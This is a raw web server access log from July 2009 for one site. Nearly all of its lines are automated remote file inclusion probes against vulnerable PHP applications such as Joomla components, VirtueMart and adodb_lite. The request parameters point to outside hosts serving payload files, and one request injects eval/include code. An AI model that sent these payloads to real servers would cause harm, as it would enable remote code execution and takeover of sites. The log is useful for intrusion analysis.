194.109.22.67 - - [04/Jul/2009:08:46:01 -0700] "GET /phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.117 - - [04/Jul/2009:08:46:04 -0700] "GET /phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.117 - - [04/Jul/2009:08:46:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.117 - - [04/Jul/2009:08:46:05 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:46:07 -0700] "GET /logs/access.log//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:08:46:38 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:08:46:38 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:08:46:39 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:08:46:40 -0700] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:08:46:40 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:08:46:40 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:08:50:02 -0700] "GET /logs/access_090521.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
194.109.22.109 - - [04/Jul/2009:08:50:03 -0700] "GET /logs/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.109 - - [04/Jul/2009:08:50:05 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.109 - - [04/Jul/2009:08:50:08 -0700] "GET /phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:08:51:34 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:08:51:34 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:08:51:34 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:08:52:33 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:08:53:02 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:08:53:02 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:08:53:02 -0700] "GET /logs/access_090212.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:08:53:46 -0700] "GET /logs/access_090212.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:08:53:46 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:08:53:46 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
87.106.179.130 - - [04/Jul/2009:08:55:30 -0700] "GET /logs/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.106.179.130 - - [04/Jul/2009:08:55:33 -0700] "GET /index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:08:56:43 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
124.0.136.1 - - [04/Jul/2009:08:58:25 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
124.0.136.1 - - [04/Jul/2009:08:58:25 -0700] "GET /phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
124.0.136.1 - - [04/Jul/2009:08:58:25 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
118.96.16.142 - - [04/Jul/2009:09:01:41 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b99) Gecko/20090605 Firefox/3.5b99" "www.hellionindustries.com"
118.96.16.142 - - [04/Jul/2009:09:06:01 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b99) Gecko/20090605 Firefox/3.5b99" "www.hellionindustries.com"
124.0.136.1 - - [04/Jul/2009:09:07:48 -0700] "GET /logs/access_090212.log/index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:08:34 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:08:34 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:08:34 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:08:38 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:08:38 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:08:38 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:09:11:15 -0700] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:09:11:15 -0700] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:09:11:15 -0700] "GET /logs/access.log%20%20//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:09:11:19 -0700] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:09:11:19 -0700] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:09:11:19 -0700] "GET /logs/access.log%20%20//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:11:37 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:11:37 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:11:37 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:11:41 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:11:41 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:11:41 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:09:11:50 -0700] "GET /rgboard/rgboard//include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:13:39 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:13:43 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:14:30 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:09:14:38 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:09:15:27 -0700] "GET /logs/rgboard/rgboard//include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:09:15:27 -0700] "GET /rgboard/rgboard//include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.106.179.130 - - [04/Jul/2009:09:15:38 -0700] "GET /logs/access_090212.log/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.118.116.55 - - [04/Jul/2009:09:21:09 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
87.118.116.55 - - [04/Jul/2009:09:21:09 -0700] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
87.118.116.55 - - [04/Jul/2009:09:21:09 -0700] "GET /logs/access.log%20%20//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
87.118.116.55 - - [04/Jul/2009:09:22:02 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.118.116.55 - - [04/Jul/2009:09:22:02 -0700] "GET /logs/scripts.log%20%20//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.118.116.55 - - [04/Jul/2009:09:22:02 -0700] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.109.245.179 - - [04/Jul/2009:09:23:47 -0700] "GET //?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.hellionindustries.com"
61.109.245.179 - - [04/Jul/2009:09:23:47 -0700] "GET /logs///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 1659 "-" "libwww-perl/5.79" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:23:48 -0700] "GET /include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:23:48 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:23:48 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:24:58 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:24:58 -0700] "GET /include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:09:24:59 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
87.118.116.55 - - [04/Jul/2009:09:26:03 -0700] "GET /logs/access.log//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
77.221.130.17 - - [04/Jul/2009:09:27:25 -0700] "GET /logs/access.log//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
77.221.130.17 - - [04/Jul/2009:09:27:25 -0700] "GET /logs//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
77.221.130.17 - - [04/Jul/2009:09:27:25 -0700] "GET /standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:09:28:35 -0700] "GET //?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:09:28:35 -0700] "GET /logs///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 1659 "-" "libwww-perl/5.65" "www.hellionindustries.com"
77.221.130.17 - - [04/Jul/2009:09:30:06 -0700] "GET /logs/access.log%20%20//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:09:31:20 -0700] "GET /logs/rgboard/rgboard//include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:09:31:21 -0700] "GET /rgboard/rgboard//include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:32:17 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:32:17 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:32:17 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:32:22 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:32:22 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:32:22 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:09:33:46 -0700] "GET /rgboard/rgboard//include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:34:00 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:34:01 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:34:01 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:34:06 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:34:06 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [04/Jul/2009:09:34:06 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.109.245.179 - - [04/Jul/2009:09:37:22 -0700] "GET /logs/access.log///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
87.118.116.55 - - [04/Jul/2009:09:37:54 -0700] "GET /logs/access.log//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:09:38:10 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:09:38:10 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:09:38:18 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
87.118.116.55 - - [04/Jul/2009:09:38:42 -0700] "GET /logs/scripts.log//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.38.29.124 - - [04/Jul/2009:09:39:05 -0700] "GET //?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.hellionindustries.com"
218.38.29.124 - - [04/Jul/2009:09:39:05 -0700] "GET /logs/access.log///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
218.38.29.124 - - [04/Jul/2009:09:39:05 -0700] "GET /logs///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 1659 "-" "libwww-perl/5.79" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:39:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:39:05 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:39:05 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:09:39:06 -0700] "GET /logs/access.log///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:39:11 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:09:39:11 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
